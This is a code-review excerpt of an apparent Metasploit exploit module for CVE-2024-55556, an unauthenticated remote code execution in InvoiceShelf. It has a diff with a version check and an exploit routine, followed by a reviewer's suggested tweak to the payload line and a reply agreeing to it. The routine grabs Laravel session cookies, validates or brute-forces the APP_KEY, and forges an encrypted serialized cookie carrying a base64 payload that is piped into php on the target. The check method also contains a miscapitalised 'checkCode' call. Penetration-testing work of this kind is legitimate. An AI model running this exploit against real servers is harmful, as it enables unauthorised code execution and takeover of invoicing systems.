modules/exploits/linux/http/invoiceshelf_unauth_rce_cve_2024_55556.rb

```diff
@@ -0,0 +1,171 @@
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'app', 'version')
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res&.code == 200
+
+    # check if target is running the InvoiceShelf platform
+    # parse json response and get the version
+    res_json = res.get_json_document
+    version_number = res_json['version'] unless res_json.blank?
+    return CheckCode::Safe('No InvoiceShelf platform found.') if version_number.nil?
+
+    if Rex::Version.new(version_number) <= Rex::Version.new('1.3.0')
+      return CheckCode::Appears("InvoiceShelf #{version_number}")
+    end
+
+    checkCode::Safe("InvoiceShelf #{version_number}")
+  end
+
+  def exploit
+    # lets first check if decryption is successful with the APP_KEY by decrypting the Laravel cookie.
+    # option APP_KEY is either a single entry of a file with APP_KEYS using the [file:] identifier
+    cipher_mode = 'AES-256-CBC'
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'login')
+    })
+    fail_with(Failure::Unknown, 'No valid response received from target.') unless res&.code == 200
+
+    print_status('Lets check if the APP_KEY(s) is/are valid by decrypting the cookie.')
+    print_status('Grabbing the cookies.')
+    set_cookie = res.get_cookies
+    fail_with(Failure::NotFound, 'No cookie found.') if set_cookie.nil?
+    laravel_session_cookie = set_cookie.match(/laravel_session=([^;]+)/) # get laravel_session cookie
+    laravel_cookie = set_cookie.match(/\w{40}=([^;]+)/) # search for the 40 alphanumeric cookie identifier
+    fail_with(Failure::NotFound, 'No cookie found. Unable to check APP_KEY.') if laravel_session_cookie.nil? || laravel_cookie.nil?
+
+    if datastore['BRUTEFORCE']
+      key_file = datastore['BRUTEFORCE']
+      print_status("Starting bruteforce decryption with APP_KEYS listed in #{key_file}.")
+      result = laravel_bruteforce_from_file(laravel_cookie[1], key_file, cipher_mode)
+      fail_with(Failure::NotFound, "Bruteforce decryption failed. No valid APP_KEY found in file #{key_file}.") if result.nil?
+      valid_app_key = result['key']
+      unciphered_value = result['value']
+    else
+      result = laravel_decrypt(laravel_cookie[1], datastore['APP_KEY'], cipher_mode)
+      fail_with(Failure::BadConfig, "Decryption with APP_KEY: #{datastore['APP_KEY']} failed.") if result.nil?
+      valid_app_key = datastore['APP_KEY']
+      unciphered_value = result
+    end
+    print_good("APP_KEY is valid: #{valid_app_key}")
+    print_good("Unciphered value: #{unciphered_value}")
+
+    print_status('Generate an encrypted serialized cookie payload with our cracked APP_KEY.')
+    pl = payload.encoded
+    pl = "echo -n #{Base64.strict_encode64(payload.encoded)}|(base64 -d||openssl enc -base64 -d)|php" if target['Type'] == :php
```

Comment:
From my testing, this variant is more stable: 
```suggestion
    pl = "echo '#{Base64.strict_encode64(payload.encoded)}'|(base64 -d||openssl enc -base64 -d)|php" if target['Type'] == :php
```

Reply:
yeah, using quotes is safer.